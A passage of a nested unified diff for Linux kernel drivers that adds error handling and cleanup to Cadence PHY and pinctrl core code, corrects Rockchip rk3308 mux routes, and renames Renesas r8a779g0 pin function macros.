+index f099053c583c0..34a380ce533a1 100644
+--- a/drivers/phy/cadence/phy-cadence-torrent.c
++++ b/drivers/phy/cadence/phy-cadence-torrent.c
+@@ -1087,6 +1087,9 @@ static int cdns_torrent_dp_set_power_state(struct cdns_torrent_phy *cdns_phy,
+ 	ret = regmap_read_poll_timeout(regmap, PHY_PMA_XCVR_POWER_STATE_ACK,
+ 				       read_val, (read_val & mask) == value, 0,
+ 				       POLL_TIMEOUT_US);
++	if (ret)
++		return ret;
++
+ 	cdns_torrent_dp_write(regmap, PHY_PMA_XCVR_POWER_STATE_REQ, 0x00000000);
+ 	ndelay(100);
+ 
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index db5fc55a5c964..3b6051d632181 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -2062,6 +2062,14 @@ pinctrl_init_controller(struct pinctrl_desc *pctldesc, struct device *dev,
+ 	return ERR_PTR(ret);
+ }
+ 
++static void pinctrl_uninit_controller(struct pinctrl_dev *pctldev, struct pinctrl_desc *pctldesc)
++{
++	pinctrl_free_pindescs(pctldev, pctldesc->pins,
++			      pctldesc->npins);
++	mutex_destroy(&pctldev->mutex);
++	kfree(pctldev);
++}
++
+ static int pinctrl_claim_hogs(struct pinctrl_dev *pctldev)
+ {
+ 	pctldev->p = create_pinctrl(pctldev->dev, pctldev);
+@@ -2142,8 +2150,10 @@ struct pinctrl_dev *pinctrl_register(struct pinctrl_desc *pctldesc,
+ 		return pctldev;
+ 
+ 	error = pinctrl_enable(pctldev);
+-	if (error)
++	if (error) {
++		pinctrl_uninit_controller(pctldev, pctldesc);
+ 		return ERR_PTR(error);
++	}
+ 
+ 	return pctldev;
+ }
+diff --git a/drivers/pinctrl/freescale/pinctrl-mxs.c b/drivers/pinctrl/freescale/pinctrl-mxs.c
+index 735cedd0958a2..5b0fcf15f2804 100644
+--- a/drivers/pinctrl/freescale/pinctrl-mxs.c
++++ b/drivers/pinctrl/freescale/pinctrl-mxs.c
+@@ -405,8 +405,8 @@ static int mxs_pinctrl_probe_dt(struct platform_device *pdev,
+ 	int ret;
+ 	u32 val;
+ 
+-	child = of_get_next_child(np, NULL);
+-	if (!child) {
++	val = of_get_child_count(np);
++	if (val == 0) {
+ 		dev_err(&pdev->dev, "no group is defined\n");
+ 		return -ENOENT;
+ 	}
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index d26682f21ad1e..6d140a60888c2 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -916,9 +916,8 @@ static struct rockchip_mux_route_data rk3308_mux_route_data[] = {
+ 	RK_MUXROUTE_SAME(0, RK_PC3, 1, 0x314, BIT(16 + 0) | BIT(0)), /* rtc_clk */
+ 	RK_MUXROUTE_SAME(1, RK_PC6, 2, 0x314, BIT(16 + 2) | BIT(16 + 3)), /* uart2_rxm0 */
+ 	RK_MUXROUTE_SAME(4, RK_PD2, 2, 0x314, BIT(16 + 2) | BIT(16 + 3) | BIT(2)), /* uart2_rxm1 */
+-	RK_MUXROUTE_SAME(0, RK_PB7, 2, 0x608, BIT(16 + 8) | BIT(16 + 9)), /* i2c3_sdam0 */
+-	RK_MUXROUTE_SAME(3, RK_PB4, 2, 0x608, BIT(16 + 8) | BIT(16 + 9) | BIT(8)), /* i2c3_sdam1 */
+-	RK_MUXROUTE_SAME(2, RK_PA0, 3, 0x608, BIT(16 + 8) | BIT(16 + 9) | BIT(9)), /* i2c3_sdam2 */
++	RK_MUXROUTE_SAME(0, RK_PB7, 2, 0x314, BIT(16 + 4)), /* i2c3_sdam0 */
++	RK_MUXROUTE_SAME(3, RK_PB4, 2, 0x314, BIT(16 + 4) | BIT(4)), /* i2c3_sdam1 */
+ 	RK_MUXROUTE_SAME(1, RK_PA3, 2, 0x308, BIT(16 + 3)), /* i2s-8ch-1-sclktxm0 */
+ 	RK_MUXROUTE_SAME(1, RK_PA4, 2, 0x308, BIT(16 + 3)), /* i2s-8ch-1-sclkrxm0 */
+ 	RK_MUXROUTE_SAME(1, RK_PB5, 2, 0x308, BIT(16 + 3) | BIT(3)), /* i2s-8ch-1-sclktxm1 */
+@@ -927,18 +926,6 @@ static struct rockchip_mux_route_data rk3308_mux_route_data[] = {
+ 	RK_MUXROUTE_SAME(1, RK_PB6, 4, 0x308, BIT(16 + 12) | BIT(16 + 13) | BIT(12)), /* pdm-clkm1 */
+ 	RK_MUXROUTE_SAME(2, RK_PA6, 2, 0x308, BIT(16 + 12) | BIT(16 + 13) | BIT(13)), /* pdm-clkm2 */
+ 	RK_MUXROUTE_SAME(2, RK_PA4, 3, 0x600, BIT(16 + 2) | BIT(2)), /* pdm-clkm-m2 */
+-	RK_MUXROUTE_SAME(3, RK_PB2, 3, 0x314, BIT(16 + 9)), /* spi1_miso */
+-	RK_MUXROUTE_SAME(2, RK_PA4, 2, 0x314, BIT(16 + 9) | BIT(9)), /* spi1_miso_m1 */
+-	RK_MUXROUTE_SAME(0, RK_PB3, 3, 0x314, BIT(16 + 10) | BIT(16 + 11)), /* owire_m0 */
+-	RK_MUXROUTE_SAME(1, RK_PC6, 7, 0x314, BIT(16 + 10) | BIT(16 + 11) | BIT(10)), /* owire_m1 */
+-	RK_MUXROUTE_SAME(2, RK_PA2, 5, 0x314, BIT(16 + 10) | BIT(16 + 11) | BIT(11)), /* owire_m2 */
+-	RK_MUXROUTE_SAME(0, RK_PB3, 2, 0x314, BIT(16 + 12) | BIT(16 + 13)), /* can_rxd_m0 */
+-	RK_MUXROUTE_SAME(1, RK_PC6, 5, 0x314, BIT(16 + 12) | BIT(16 + 13) | BIT(12)), /* can_rxd_m1 */
+-	RK_MUXROUTE_SAME(2, RK_PA2, 4, 0x314, BIT(16 + 12) | BIT(16 + 13) | BIT(13)), /* can_rxd_m2 */
+-	RK_MUXROUTE_SAME(1, RK_PC4, 3, 0x314, BIT(16 + 14)), /* mac_rxd0_m0 */
+-	RK_MUXROUTE_SAME(4, RK_PA2, 2, 0x314, BIT(16 + 14) | BIT(14)), /* mac_rxd0_m1 */
+-	RK_MUXROUTE_SAME(3, RK_PB4, 4, 0x314, BIT(16 + 15)), /* uart3_rx */
+-	RK_MUXROUTE_SAME(0, RK_PC1, 3, 0x314, BIT(16 + 15) | BIT(15)), /* uart3_rx_m1 */
+ };
+ 
+ static struct rockchip_mux_route_data rk3328_mux_route_data[] = {
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index 9ad8f70206142..cd23479f352a2 100644
+--- a/drivers/pinctrl/pinctrl-single.c
++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -1328,7 +1328,6 @@ static void pcs_irq_free(struct pcs_device *pcs)
+ static void pcs_free_resources(struct pcs_device *pcs)
+ {
+ 	pcs_irq_free(pcs);
+-	pinctrl_unregister(pcs->pctl);
+ 
+ #if IS_BUILTIN(CONFIG_PINCTRL_SINGLE)
+ 	if (pcs->missing_nr_pinctrl_cells)
+@@ -1885,7 +1884,7 @@ static int pcs_probe(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		goto free;
+ 
+-	ret = pinctrl_register_and_init(&pcs->desc, pcs->dev, pcs, &pcs->pctl);
++	ret = devm_pinctrl_register_and_init(pcs->dev, &pcs->desc, pcs, &pcs->pctl);
+ 	if (ret) {
+ 		dev_err(pcs->dev, "could not register single pinctrl driver\n");
+ 		goto free;
+@@ -1918,8 +1917,10 @@ static int pcs_probe(struct platform_device *pdev)
+ 
+ 	dev_info(pcs->dev, "%i pins, size %u\n", pcs->desc.npins, pcs->size);
+ 
+-	return pinctrl_enable(pcs->pctl);
++	if (pinctrl_enable(pcs->pctl))
++		goto free;
+ 
++	return 0;
+ free:
+ 	pcs_free_resources(pcs);
+ 
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index acf7664ea835b..595a5a4b02ecb 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -62,20 +62,20 @@
+ #define GPSR0_9		F_(MSIOF5_SYNC,		IP1SR0_7_4)
+ #define GPSR0_8		F_(MSIOF5_SS1,		IP1SR0_3_0)
+ #define GPSR0_7		F_(MSIOF5_SS2,		IP0SR0_31_28)
+-#define GPSR0_6		F_(IRQ0,		IP0SR0_27_24)
+-#define GPSR0_5		F_(IRQ1,		IP0SR0_23_20)
+-#define GPSR0_4		F_(IRQ2,		IP0SR0_19_16)
+-#define GPSR0_3		F_(IRQ3,		IP0SR0_15_12)
++#define GPSR0_6		F_(IRQ0_A,		IP0SR0_27_24)
++#define GPSR0_5		F_(IRQ1_A,		IP0SR0_23_20)
++#define GPSR0_4		F_(IRQ2_A,		IP0SR0_19_16)
++#define GPSR0_3		F_(IRQ3_A,		IP0SR0_15_12)
+ #define GPSR0_2		F_(GP0_02,		IP0SR0_11_8)
+ #define GPSR0_1		F_(GP0_01,		IP0SR0_7_4)
+ #define GPSR0_0		F_(GP0_00,		IP0SR0_3_0)
+ 
+ /* GPSR1 */
+-#define GPSR1_28	F_(HTX3,		IP3SR1_19_16)
+-#define GPSR1_27	F_(HCTS3_N,		IP3SR1_15_12)
+-#define GPSR1_26	F_(HRTS3_N,		IP3SR1_11_8)
+-#define GPSR1_25	F_(HSCK3,		IP3SR1_7_4)
+-#define GPSR1_24	F_(HRX3,		IP3SR1_3_0)
++#define GPSR1_28	F_(HTX3_A,		IP3SR1_19_16)
++#define GPSR1_27	F_(HCTS3_N_A,		IP3SR1_15_12)
++#define GPSR1_26	F_(HRTS3_N_A,		IP3SR1_11_8)
++#define GPSR1_25	F_(HSCK3_A,		IP3SR1_7_4)
++#define GPSR1_24	F_(HRX3_A,		IP3SR1_3_0)
+ #define GPSR1_23	F_(GP1_23,		IP2SR1_31_28)
+ #define GPSR1_22	F_(AUDIO_CLKIN,		IP2SR1_27_24)
+ #define GPSR1_21	F_(AUDIO_CLKOUT,	IP2SR1_23_20)
+@@ -113,14 +113,14 @@
+ #define GPSR2_11	F_(CANFD0_RX,		IP1SR2_15_12)
+ #define GPSR2_10	F_(CANFD0_TX,		IP1SR2_11_8)
+ #define GPSR2_9		F_(CAN_CLK,		IP1SR2_7_4)
+-#define GPSR2_8		F_(TPU0TO0,		IP1SR2_3_0)
+-#define GPSR2_7		F_(TPU0TO1,		IP0SR2_31_28)
++#define GPSR2_8		F_(TPU0TO0_A,		IP1SR2_3_0)
++#define GPSR2_7		F_(TPU0TO1_A,		IP0SR2_31_28)
+ #define GPSR2_6		F_(FXR_TXDB,		IP0SR2_27_24)
+-#define GPSR2_5		F_(FXR_TXENB_N,		IP0SR2_23_20)
++#define GPSR2_5		F_(FXR_TXENB_N_A,	IP0SR2_23_20)
+ #define GPSR2_4		F_(RXDB_EXTFXR,		IP0SR2_19_16)
+ #define GPSR2_3		F_(CLK_EXTFXR,		IP0SR2_15_12)
+ #define GPSR2_2		F_(RXDA_EXTFXR,		IP0SR2_11_8)
+-#define GPSR2_1		F_(FXR_TXENA_N,		IP0SR2_7_4)
++#define GPSR2_1		F_(FXR_TXENA_N_A,	IP0SR2_7_4)
+ #define GPSR2_0		F_(FXR_TXDA,		IP0SR2_3_0)
+ 
+ /* GPSR3 */
+@@ -269,13 +269,13 @@
+ 
+ /* SR0 */
+ /* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3_A)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2_A)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1_A)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0_A)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+@@ -284,72 +284,72 @@
+ #define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1_A)		FM(IRQ2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1_A)		FM(TX1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1_A)		FM(RX1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N_A)		FM(CTS1_N_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N_A)		FM(RTS1_N_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1_A)		FM(SCK1_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+ /* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_B)		FM(TX3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_B)		FM(RX3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_B)		FM(RTS3_N_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_B)		FM(CTS3_N_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_B)		FM(SCK3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_B)		FM(TX1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_B)		FM(RX1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_B)		FM(CTS1_N_B)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_B)		FM(RTS1_N_B)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_B)		FM(SCK1_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ #define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
